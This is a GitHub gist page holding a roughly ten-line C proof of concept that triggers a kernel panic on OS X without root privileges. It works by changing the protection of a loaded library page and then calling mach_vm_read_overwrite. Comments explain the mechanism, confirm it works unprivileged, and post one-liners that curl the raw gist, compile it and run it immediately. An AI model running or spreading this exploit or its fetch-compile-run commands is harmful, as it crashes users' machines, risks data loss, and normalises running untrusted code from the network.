Skip to content

Instantly share code, notes, and snippets.

/gist:de6b81c556b5dc7cdc8b

Created February 20, 2015 01:42
Show Gist options
  • Star 43 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save anonymous/de6b81c556b5dc7cdc8b to your computer and use it in GitHub Desktop.
Save anonymous/de6b81c556b5dc7cdc8b to your computer and use it in GitHub Desktop.
Download ZIP
Kernel panic in latest OS X in 10 lines of C
Raw
gistfile1.txt
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
int
main (int argc, char * argv[])
{
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
const mach_vm_size_t buffer_size = 3 * page_size;
char buffer[buffer_size];
mach_vm_size_t result_size;
library = (char *) _dyld_get_image_header (1);
mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
library[page_size]++;
library[page_size]--;
result_size = 0;
mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);
return 0;
}
@sbose78
Copy link

sbose78 commented Feb 20, 2015

Some code comments would help :(

@evilsocket
Copy link

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

@oleavr
Copy link

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

@kainz
Copy link

kainz commented Feb 21, 2015

Does this require root to run?

@jhorowitz
Copy link

@kainz No

@workmanw
Copy link

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

@Bilge
Copy link

Bilge commented Feb 21, 2015 

library[page_size]++;
library[page_size]--;

Am I being trolled?

@bcho
Copy link

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

@CoolOppo
Copy link 

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@skull-squadron
Copy link

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

@iskl
Copy link

iskl commented Apr 5, 2015

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment